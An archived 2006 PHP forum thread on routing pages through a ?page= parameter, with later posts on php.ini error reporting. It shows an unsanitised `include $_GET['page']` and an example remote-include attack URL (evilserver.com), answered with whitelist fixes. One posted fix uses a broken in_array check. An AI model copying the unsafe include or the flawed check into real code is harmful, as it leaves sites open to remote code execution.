logo
Apache Lounge
Webmasters

 

About Forum Index Downloads Search Register Log in RSS X


Keep Server Online

If you find the Apache Lounge, the downloads and overall help useful, please express your satisfaction with a donation.

or

Bitcoin

A donation makes a contribution towards the costs, the time and effort that's going in this site and building.

Thank You! Steffen

Your donations will help to keep this site alive and well, and continuing building binaries. Apache Lounge is not sponsored.
Post new topic   Forum Index -> Coding & Scripting Corner View previous topic :: View next topic
Reply to topic   Topic: Page IDs Page 1, 2  Next
Author
sb.net



Joined: 22 Sep 2006
Posts: 120
Location: USA

PostPosted: Sun 12 Nov '06 21:46    Post subject: Page IDs Reply with quote

How would I do this in PHP?

Have one page that would contain other pages. Like this. Address in bar:


www.something.com/index.php?page=home

and have another page like this:

www.something.com/index.php?page=stuff


So basically I need to have one page that does a lot. I would want it to have a server-side-include that would change. Can somebody help me with that?
Back to top
James Blond
Moderator


Joined: 19 Jan 2006
Posts: 7360
Location: Germany, Next to Hamburg

PostPosted: Sun 12 Nov '06 22:31    Post subject: Reply with quote

You can do that like
Code:

<?php
$page=$_GET['page'];
include $page;
?>


But you must be very carefull with that! Some bad ppl could mess with that like

www.something.com/index.php?page=http://evilserver.com/badinput.php

So you have to check what is coming in. Or much better, create a white list!

Code:

$allowed_sites = array( "help", "main", "contact" );

if ( in_array( $_GET['page'] ) )
{
  include( './includes/' . $_GET['page'] . '.php' );
}
else
{
  die "Hacking attempt";



This scripts also inlcude from the subfolder includes. So no one can hack it.
Back to top
sb.net



Joined: 22 Sep 2006
Posts: 120
Location: USA

PostPosted: Mon 13 Nov '06 0:39    Post subject: Reply with quote

Thanks Very Happy, That works great. But the safety code does not. I put that in and nothing comes up. Crying or Very sad
I tried something like www.something.com/index.php?page=http://evilserver.com/badinput.php, and nothing happened. It didn't work anyway.
I was wondering if index.php could read another page with all the links? Because then I would not need to give ?name=something.php. I could just give something.
Back to top
James Blond
Moderator


Joined: 19 Jan 2006
Posts: 7360
Location: Germany, Next to Hamburg

PostPosted: Mon 13 Nov '06 12:15    Post subject: Reply with quote

Whoops! I was in a hurry, sorry! Made some syntax errors Embarassed

Code:

<?php
$allowed_sites = array( "help", "main", "contact" );

if(in_array( $_GET['page'],$allowed_sites)){
   include( './includes/' . $_GET['page'] . '.php' );
}
else
{
   die("Hacking attempt");
}
?> 


But there is still missing an error handling when $_GET['page'] is empty!
Back to top
sb.net



Joined: 22 Sep 2006
Posts: 120
Location: USA

PostPosted: Mon 13 Nov '06 15:04    Post subject: Reply with quote

This is weired.

index.php
Code:
<html>
<body>
<?php
$page=$_GET['page'];
include $page;
?>

<?php
$allowed_sites = array( "hi.php", "main", "contact" );

if(in_array( $_GET['page'],$allowed_sites)){
   include( './includes/' . $_GET['page'] . '.php' );
}
else
{
   die("Hacking attempt");
}
?>

Hi

</body>
</html>


hi.php in the folder "includes"
Code:
this is hi.php


look at some of these links:
http://data-base-web.com/tester/index.php?page=includes/hi.php

hi.php is not in this folder:
http://data-base-web.com/tester/index.php?page=hi.php

http://data-base-web.com/tester/index.php?page=hi

It is doing some of the things right.
Back to top
James Blond
Moderator


Joined: 19 Jan 2006
Posts: 7360
Location: Germany, Next to Hamburg

PostPosted: Mon 13 Nov '06 15:16    Post subject: Reply with quote

Why do you include the file 2 times?
include $page and include( './includes/' . $_GET['page'] . '.php' );
that make no sense.

the include( './includes/' . $_GET['page'] . '.php' ); always in include a php file! You don't have to put the .php in the url! If you dou, the include tries to
include e.g. inlcude/hi.php.php

in the array $allowed_sites you don' t have to set .php, only put "hi" into it.


For debugging, you should show all errors.

error_reporting(E_ALL);
Back to top
sb.net



Joined: 22 Sep 2006
Posts: 120
Location: USA

PostPosted: Mon 13 Nov '06 15:31    Post subject: Reply with quote

That was stupid of me. It works fine now. Thank you! Smile
Back to top
sb.net



Joined: 22 Sep 2006
Posts: 120
Location: USA

PostPosted: Mon 13 Nov '06 20:34    Post subject: Reply with quote

I have folders (besides includes) and sub-folders and I need to have those page too. How would I do that.

EDIT: actually can you make a script with a category and page.
It would control a folder and a file.
Back to top
Brian



Joined: 21 Oct 2005
Posts: 209
Location: Puyallup, WA USA

PostPosted: Mon 13 Nov '06 22:53    Post subject: Reply with quote

Code:
<?php

$pages = array(
   'index'    => array(
      'dir'   => '/dir1/dir2/',
      'file'   => 'page.php',
   ),
   'index2'   => array(
      'dir'   => '/dir1/dir3/',
      'file'   => 'page.php',
   ),
   'index3'   => array(
      'dir'   => '/dir1/dir2/',
      'file'   => 'page2.php',
   ),
   'index4'   => array(
      'dir'   => '/dir1/dir4/',
      'file'   => 'page.php',
   ),
);

// assuming GET here, and set to 'index' if not provided
// this is basic error correction
$page = ( $_GET['page'] ) ? strtolower( $_GET['page'] ) : 'index';

// if it's not in the array, let's go to the default which
// is 'index'
if( !in_array( $page, $pages ) )
   $page = 'index';

// now include the correct page from the appropriate dir
include( $pages[$page]['dir'] . $pages[$page]['file'] );

?>


As an example if you had:

http://www.someurl.com?page=index2

It would load the values from 'index2' which would be a path of:

/dir1/dir3/page.php

Does this make sense?

It gets complicated, but if you use arrays that are populated from a db, such as if you were using a Content Management System of some sort, then this could actually be highly flexible, making it so easy to change where pages load from, and all the while the client never knows because the URL does not change.

What's more, you can change pages based on such things as the HTTP_REFERER, the IP, the time of day, or what ever criteria you want. I use complex arrays for sites that have to change a lot, or have to change based on certain "conditions".
Back to top
sb.net



Joined: 22 Sep 2006
Posts: 120
Location: USA

PostPosted: Mon 13 Nov '06 22:56    Post subject: Reply with quote

I was thinking more along the lines of http://www.someurl.com/index.php?cat=folder&page=file .
Back to top
Brian



Joined: 21 Oct 2005
Posts: 209
Location: Puyallup, WA USA

PostPosted: Tue 14 Nov '06 0:03    Post subject: Reply with quote

It is the same principle, but instead you pass two vars and maybe you use multple one dimensional arrays, I dunno.

At some risk here, I suggest that you should really buy a book on PHP if you are working with the extreme basic stuff. Seriously, that is what I did, but you can also get a ton of info using the online manuals at php.net as well.

The example I offered could be modified in twenty different ways, or more. It's just an example, but if you would prefer to pass a bunch of variables, you have to consider error detection, correction, and by extension, security.

What happens when they pass a bunch of bogus variables across, how does your web site's backend respond?

You can write your URL's on so many ways such as:

Code:
?c=folder&page=file
?c=folder,file
?c=folder,file,0e25b6dd4ca582a5e63d8f706af011d0 // checksum
// or you could use a session to deliver the checksum,
// using client side javascript
// sky is the limit
?c[0]=folder&c[1]=file // results in an array


So you decide based on your needs. But your needs should be guided by security, in my estimation. Security is only as sound as your knowledge base is at the time you write your code. Start with the basics, get a book - that is my sincere and humble advice.
Back to top
sb.net



Joined: 22 Sep 2006
Posts: 120
Location: USA

PostPosted: Tue 14 Nov '06 15:12    Post subject: Reply with quote

Well, I don't have a book now. And I need this script. I edited James' script. But I did not work. This is the script, but can you please help me?

Code:
$c=$_GET['c'];
$page=$_GET['page'];

$allowed_sites = array( "hi", "main", "contact" );

if(in_array( $_GET['c'],$_GET['page'],$allowed_sites))
{
   include( . /$_GET['c']/ . $_GET['page'] . '.php' );
}

else
{
   die("Hacking attempt");
}


Nothing comes up when I open http://data-base-web.com/tester/index.php?c=includes&page=hi .
Back to top
James Blond
Moderator


Joined: 19 Jan 2006
Posts: 7360
Location: Germany, Next to Hamburg

PostPosted: Tue 14 Nov '06 15:56    Post subject: Reply with quote

Turn your error handling on! Or you won't see the errors!

in your php.ini

Code:

error_reporting  =  E_ALL & ~E_NOTICE
display_errors = On
Back to top
Brian



Joined: 21 Oct 2005
Posts: 209
Location: Puyallup, WA USA

PostPosted: Tue 14 Nov '06 16:00    Post subject: Reply with quote

Yes, and along with turning on error reporting, as you should for development anyway, you should also ensure you are writing to a PHP.LOG file, or PHP_ERROR.LOG, what ever you call it. You should see errors reported to some log file that you designate in your PHP.INI file. Always look at the logs for helpful troubleshooting info.
Back to top
sb.net



Joined: 22 Sep 2006
Posts: 120
Location: USA

PostPosted: Tue 14 Nov '06 17:55    Post subject: Reply with quote

I enabled the errors, but it does not come up with errors.
http://www.data-base-web.com/tester/index.php?cat=includes&page=hi

you can go here.
Back to top
Brian



Joined: 21 Oct 2005
Posts: 209
Location: Puyallup, WA USA

PostPosted: Tue 14 Nov '06 19:44    Post subject: Reply with quote

Paste the portion of your PHP.INI file that covers Error Reporting would you. It appears you do not have error reporting set properly by my estimation. Further, what do you have for error log set up in your PHP.INI?

You really need both the error log and the error reporting.
Back to top
sb.net



Joined: 22 Sep 2006
Posts: 120
Location: USA

PostPosted: Tue 14 Nov '06 19:50    Post subject: Reply with quote

Code:
; - register_long_arrays = Off     [Performance]
;     Disables registration of the older (and deprecated) long predefined array
;     variables ($HTTP_*_VARS).  Instead, use the superglobals that were
;     introduced in PHP 4.1.0
 - display_errors = On       [Security]
;     With this directive set to off, errors that occur during the execution of
;     scripts will no longer be displayed as a part of the script output, and thus,
;     will no longer be exposed to remote users.  With some errors, the error message
;     content may expose information about your script, web server, or database
;     server that may be exploitable for hacking.  Production sites should have this
;     directive set to off.
; - log_errors = On                [Security]
;     This directive complements the above one.  Any errors that occur during the
;     execution of your script will be logged (typically, to your server's error log,
;     but can be configured in several ways).  Along with setting display_errors to off,
;     this setup gives you the ability to fully understand what may have gone wrong,
;     without exposing any sensitive information to remote users.
; - output_buffering = 4096        [Performance]
;     Set a 4KB output buffer.  Enabling output buffering typically results in less
;     writes, and sometimes less packets sent on the wire, which can often lead to
;     better performance.  The gain this directive actually yields greatly depends
;     on which Web server you're working with, and what kind of scripts you're using.
; - register_argc_argv = Off       [Performance]
;     Disables registration of the somewhat redundant $argv and $argc global
;     variables.
; - magic_quotes_gpc = Off         [Performance]
;     Input data is no longer escaped with slashes so that it can be sent into
;     SQL databases without further manipulation.  Instead, you should use the
;     function addslashes() on each input element you wish to send to a database.
; - variables_order = "GPCS"       [Performance]
;     The environment variables are not hashed into the $_ENV.  To access
;     environment variables, you can use getenv() instead.
; - error_reporting = E_ALL        [Code Cleanliness, Security(?)]
;     By default, PHP suppresses errors of type E_NOTICE.  These error messages
;     are emitted for non-critical errors, but that could be a symptom of a bigger
;     problem.  Most notably, this will cause error messages about the use
;     of uninitialized variables to be displayed.
; - allow_call_time_pass_reference = Off     [Code cleanliness]
;     It's not possible to decide to force a variable to be passed by reference
;     when calling a function.  The PHP 4 style to do this is by making the
;     function require the relevant argument by reference.


I also have error_reporting = E_ALL & ~E_NOTICE
Back to top
Brian



Joined: 21 Oct 2005
Posts: 209
Location: Puyallup, WA USA

PostPosted: Tue 14 Nov '06 20:12    Post subject: Reply with quote

Okay, everything you posted above is comment text and none of it has any bearing on the functionality or performance of your server.

On my local testing server, running FCGI, here is my settings for logging and reporting errors:

Code:
error_reporting  =  E_PARSE |  E_ERROR |  E_WARNING | E_NOTICE
display_errors = On
display_startup_errors = On
log_errors = On
log_errors_max_len = 1024
ignore_repeated_errors = Off
ignore_repeated_source = Off
report_memleaks = On
track_errors = Off
error_log = c:/apache2/logs/PHP_FCGI_error.log


I chose to report most things, even notices, I like my production code to be ultra clean, though it's not really necessary I suppose.

Tell me if you have something like these settings. Notice that I created a log file with error_log = c:/apache2/logs/PHP_FCGI_error.log. I hope this helps you out a bit to get the error reporting and logging enabled and functional.

Even if you you have something not shown to the screen, which in a production environment you would not want in most cases, you should be logging these errors.

Notice: None of the lines of my INI pasted above are commented out, that is, starting with a ; semicolon character. These are the basics of configuring and running a PHP based web server that a book will help you with, to get the basics down first, building a knowledge foundation.


Last edited by Brian on Tue 14 Nov '06 20:13; edited 1 time in total
Back to top
sb.net



Joined: 22 Sep 2006
Posts: 120
Location: USA

PostPosted: Tue 14 Nov '06 20:13    Post subject: Reply with quote

look at the 7th line
Back to top
Brian



Joined: 21 Oct 2005
Posts: 209
Location: Puyallup, WA USA

PostPosted: Tue 14 Nov '06 20:24    Post subject: Reply with quote

Something else that crosses my mind, why do you not have error detection and correction in place?

For example, if you say page=index but let's say someone gets cute and tries to type page=indexx or something else, what happens?

I suggest you force them back to the default page, perhaps defaulting back to page=index. Error detection can also allow you an opportunity to create through your PHP scripts custom logging, something my sites do when needed. They open and update a log file (flat text file), or make a db entry. This can be useful in some cases. Again, all basic stuff.
Back to top


Reply to topic   Topic: Page IDs View previous topic :: View next topic
Post new topic   Forum Index -> Coding & Scripting Corner Page 1, 2  Next